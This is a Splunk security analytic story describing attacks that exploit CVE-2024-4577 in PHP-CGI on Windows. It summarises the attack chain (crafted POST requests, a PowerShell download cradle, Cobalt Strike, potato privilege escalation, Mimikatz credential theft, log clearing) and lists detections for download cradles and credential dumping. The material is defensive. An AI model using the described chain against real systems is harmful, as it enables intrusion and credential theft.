Analytics Story: PHP-CGI RCE Attack on Japanese Organizations

Date: 2025-03-17 ID: e347c55f-439b-4758-8e08-9e2a37a806bc Author: Michael Haag, Splunk Product: Splunk Enterprise Security

Description

This analytic story covers attacks exploiting CVE-2024-4577, a remote code execution (RCE) vulnerability in the PHP-CGI implementation on Windows. Attackers leverage this vulnerability to gain initial access, deploy Cobalt Strike using the "TaoWu" kit for post-exploitation activities, and establish persistence. The attacks primarily target organizations across various sectors including technology, telecommunications, entertainment, education, and e-commerce.

Why it matters

The attack begins with the exploitation of CVE-2024-4577, a critical RCE vulnerability in Windows-based PHP installations using CGI configurations. The vulnerability arises from the "Best-Fit" behavior in Windows code pages, where certain characters are replaced in command-line inputs, causing the PHP-CGI module to misinterpret these characters as PHP options and allowing arbitrary code execution. After identifying vulnerable targets, attackers use a Python exploit script to send specially crafted POST requests containing PHP code. Upon successful exploitation, a PowerShell download cradle retrieves and executes a PowerShell injector script from a command and control (C2) server, which deploys Cobalt Strike reverse HTTP shellcode. Post-exploitation activities include reconnaissance (gathering system information), privilege escalation (using JuicyPotato, RottenPotato, SweetPotato exploits), persistence (modifying registry keys, creating scheduled tasks, and Windows services), defense evasion (clearing event logs), lateral movement (network scanning and abusing Group Policy Objects), and credential theft (using Mimikatz). The attackers utilize the "TaoWu" Cobalt Strike kit for many of these actions and have access to additional adversarial frameworks hosted on an Alibaba cloud container Registry, including Blue-Lotus (JavaScript webshell XSS framework), BeEF (Browser Exploitation Framework), and Viper C2. Detection opportunities include monitoring for suspicious PowerShell download cradles, unusual process spawning patterns, registry modifications for persistence, scheduled task creation, Windows service creation, event log clearing, and network scanning activities.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
Any Powershell DownloadFile PowerShell, Ingress Tool Transfer TTP
Any Powershell DownloadString PowerShell, Ingress Tool Transfer TTP
Attacker Tools On Endpoint OS Credential Dumping, Match Legitimate Name or Location, Active Scanning TTP
Detect Regsvr32 Application Control Bypass Regsvr32 TTP
PowerShell 4104 Hunting PowerShell Hunting
PowerShell WebRequest Using Memory Stream PowerShell, Ingress Tool Transfer, Fileless Storage TTP
System User Discovery With Whoami System Owner/User Discovery Hunting
W3WP Spawning Shell Web Shell TTP
Windows Process Writing File to World Writable Path Mshta Hunting

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
CrowdStrike ProcessRollup2 N/A crowdstrike:events:sensor crowdstrike
Powershell Script Block Logging 4104 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 Windows icon Windows xmlwineventlog XmlWinEventLog:Security

References

Source: GitHub | Version: 1